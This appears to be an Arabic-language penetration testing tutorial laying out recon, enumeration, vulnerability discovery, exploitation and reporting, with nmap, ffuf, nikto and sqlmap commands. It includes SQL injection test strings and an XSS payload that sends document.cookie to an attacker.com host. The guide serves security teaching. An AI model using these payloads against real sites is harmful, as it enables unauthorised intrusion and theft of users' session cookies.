المرحلة الأولى: الاستطلاع (Reconnaissance)

الاستطلاع هو أساس أي اختبار اختراق ناجح. كلما جمعت معلومات أكثر، زادت فرصك في اكتشاف الثغرات.

Passive Recon — بدون لمس الهدف

# جمع معلومات DNS
whois target.com
dig target.com ANY
subfinder -d target.com -o subdomains.txt

# البحث في Google Dorks
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com "index of /"

# Shodan للبنية التحتية
shodan search hostname:target.com

Active Recon — المسح المباشر

# فحص المنافذ والخدمات
nmap -sV -sC -p- --min-rate 5000 -oN scan.txt target.com

# اكتشاف المسارات الخفية
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc 404

# اكتشاف النطاقات الفرعية
ffuf -u https://FUZZ.target.com -w subdomains.txt -fc 404

المرحلة الثانية: التعداد (Enumeration)

بعد اكتشاف الهدف، ننتقل لفهم التطبيق بعمق.

تحليل التطبيق

  • تحديد التقنيات المستخدمة (Wappalyzer, WhatWeb)
  • رسم خريطة نقاط الدخول (Login, Upload, API endpoints)
  • تحليل JavaScript files لإيجاد endpoints مخفية
  • فحص HTTP headers للمعلومات الحساسة
# تحليل الويب
whatweb -a 3 https://target.com
nikto -h https://target.com -ssl

# استخراج endpoints من JS
python3 LinkFinder.py -i https://target.com -d

المرحلة الثالثة: اكتشاف الثغرات

أهم الثغرات للفحص (OWASP Top 10)

الثغرةالأولويةالأدوات
SQL Injection🔴 عاليةsqlmap, manual
XSS🟡 متوسطةXSStrike, Dalfox
SSRF🔴 عاليةManual, Burp
IDOR🟡 متوسطةManual
File Upload🔴 عاليةManual

SQL Injection — الاختبار اليدوي

-- اختبار بسيط
' OR '1'='1
' OR 1=1--
' UNION SELECT NULL,NULL,NULL--

-- Time-based blind
'; WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--

المرحلة الرابعة: الاستغلال (Exploitation)

⚠️ تحذير: قم بالاستغلال فقط على أنظمة مرخصة لك باختبارها.

# SQL Injection مع sqlmap
sqlmap -u "https://target.com/page?id=1" --dbs --batch --level=5

# XSS Payload
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

المرحلة الخامسة: التقرير (Reporting)

التقرير الجيد يجب أن يحتوي على:

  1. ملخص تنفيذي للإدارة (غير تقني)
  2. تفاصيل تقنية لكل ثغرة مع CVSS score
  3. خطوات الاستغلال (Proof of Concept)
  4. التوصيات والحلول المقترحة
  5. المراجع والموارد